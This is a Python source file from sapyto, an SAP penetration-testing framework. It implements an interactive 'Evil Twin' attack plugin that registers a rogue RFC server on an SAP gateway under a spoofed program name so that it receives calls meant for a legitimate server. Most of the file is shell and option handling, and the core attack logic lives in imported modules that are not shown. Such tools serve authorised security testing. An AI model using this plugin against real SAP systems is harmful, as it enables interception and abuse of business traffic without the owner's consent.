# -*- coding: latin-1 -*-
'''
eviltwin.py

Copyright 2007 Mariano Nuez Di Croce @ CYBSEC

This file is part of sapyto, http://www.cybsec.com/EN/research/tools/sapyto.php

sapyto is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.

sapyto is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with sapyto; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
'''
from core.basePlugins.baseShellPlugin import baseShellPlugin
import core.kb.knowledgeBase as kb
import core.output.outputManager as om
import saprfcutil
from saprfc import *
from core.misc import *
import core.sapytoCore as core
from core.exceptions.dontRunException import dontRunException

#RFC imports
import core.rfc.rfcServer as rfcServer
import core.rfc.callBackHandlers.fooCBH as fooCBH


class eviltwin(baseShellPlugin):
	'''
	Evil Twin server. Register external servers to perform different attacks.
	
	@author: Mariano Nuez Di Croce <mnunez@cybsec.com>
	'''
	def __init__( self):
		baseShellPlugin.__init__(self)
		self._menu = {'help':self._help, 'register':self._register, 'disconnect':self._disconnect, 'set':self._set, 'view':self._view, 'back':self._back}
		self._Options = {}
		self._funcname = 'foo'
		self._tpname = 'sapyto.evil'
	
	def sh( self ):
		'''
		Starts the shell's main loop.
		
		@return: The prompt
		'''
		prompt = 'sapyto/attack/eviltwin>>> '
		self.parseXML(self.getOptionsXML())
		self._mainloop( prompt )		
	
	def _exec( self, command ):
		'''
		Executes a user input.
		'''
		command, parameters = self._parse( command )
		
		if command in self._menu.keys():
			func = self._menu[command]
			try:
				res = func(parameters)
			except sapytoException,e:
				om.out.console( str(e) )
			else:
				return res
		else:
			om.out.console( 'command not found' )
		return True
		
	
	def _help( self, parameters ):
		'''
		Prints a help message to the user.
		'''
		om.out.console('The following commands are available:')
		self.mprint('help','You are here.')
		self.mprint('register','Register evil twin server.')
		self.mprint('set','Set plugin options.')
		self.mprint('view','View plugin options.')
		self.mprint('disconnect','Close connection with RFC server.')
		self.mprint('back','Return to previous menu.')
		return True
	
	def _back( self, parameters ):
		return False

	def run( self ):
		try:
			core.sCore.validateTargets(self._targets)
		except dontRunException:
			return False	
		self.sh()
	
	def _register(self, parameters):
		om.out.information('Trying to create Evil Twin...')
		target = core.sCore.getTarget()
		if self._conn.type == '3':
			# Connection was defined for a R3 connection. Use ASHOST as GWHOST.
			gwhost = self._conn.ashost
			gwserv = target['gwserv']
		elif self._conn.type == 'E':
			gwhost = self._conn.gwhost
			gwserv = self._conn.gwserv # TODO: Validate better
		else:
			om.out.information('Not supported')
			return
		tpname = self._tpname
		om.out.information('Registering Evil Twin \'' + tpname + '\' at ' + gwhost)
		# Register Evil Twin
		reg = rfcServer.rfcServer(gwhost,gwserv, tpname, justForCallback=True)
		cb = fooCBH.fooCBH()
		cb.setCore(self._sapyto)
		cb.setCommands(self._commands)
		reg.setGlobalHandler(cb)
		conn = None
		try:
			conn = reg.register()
		except:
			# TODO: Validate connection errors
			om.out.error('Couldn\'t register.')
		
		return True
	
	def _disconnect(self, parameters):
		if self._conn.is_connected():
			self._conn.close()
		om.out.information('Disconnected.')
		return True

	def _view( self , parameters):
		'''
		List all configurable parameters of a plugin.
		'''
		self.mprint('Parameter','Value')
		self.mprint('=========','=====')
		for value in self._Options.keys():
			self.mprint(value,self._Options[value]['default'])
		return True
	
	def _set( self , parameters):
		'''
		Configure a value.
		'''
		if len( parameters ) < 2:
			om.out.console('Invalid call to set, please see the help:')
			self._help( ['set'] )
		else:
			param = parameters[0]
			value = parameters[1:]
			value = ' '.join( value )
			resVal = None
			if param in self._Options.keys():
				type = self._Options[param]['type']
				try:
					resVal = core.sCore.parseOption(type, value)
				except sapytoException:
					om.out.console( 'Parameter ' + param + ' must be of type ' +  type)
				else:
					self._Options[ param ]['default'] = resVal
			else:	
				om.out.console( 'Unknown parameter.' )
		return True
		
	def getOptionsXML(self):
		'''
		This method returns a XML containing the Options that the plugin has.
		Using this XML the framework will build a window, a menu, or some other input method to retrieve
		the info from the user. The XML has to validate against the xml schema file located at :
		sapyto/core/ui/userInterface.dtd
		
		@return: XML with the plugin options.
		'''	
		return	'<?xml version="1.0" encoding="ISO-8859-1"?>\
		<OptionList>\
			<Option name="funcname">\
				<default>foo</default>\
				<desc>Function Name</desc>\
				<type>String</type>\
				<required>True</required>\
			</Option>\
			<Option name="tpname">\
				<default>sapyto.evil</default>\
				<desc>Server\'s tpname used for registration</desc>\
				<type>String</type>\
				<required>False</required>\
			</Option>\
		</OptionList>\
		'

	def setOptions( self, OptionList ):
		'''
		This method sets all the options that are configured using the user interface 
		generated by the framework using the result of getOptionsXML().
		
		@parameter OptionList: A dictionary with the options for the plugin.
		@return: No value is returned.
		'''	
		if 'funcname' in OptionList.keys(): 
			self._funcname = OptionList['funcname']
		if 'tpname' in OptionList.keys(): 
			self._tpname = OptionList['tpname']
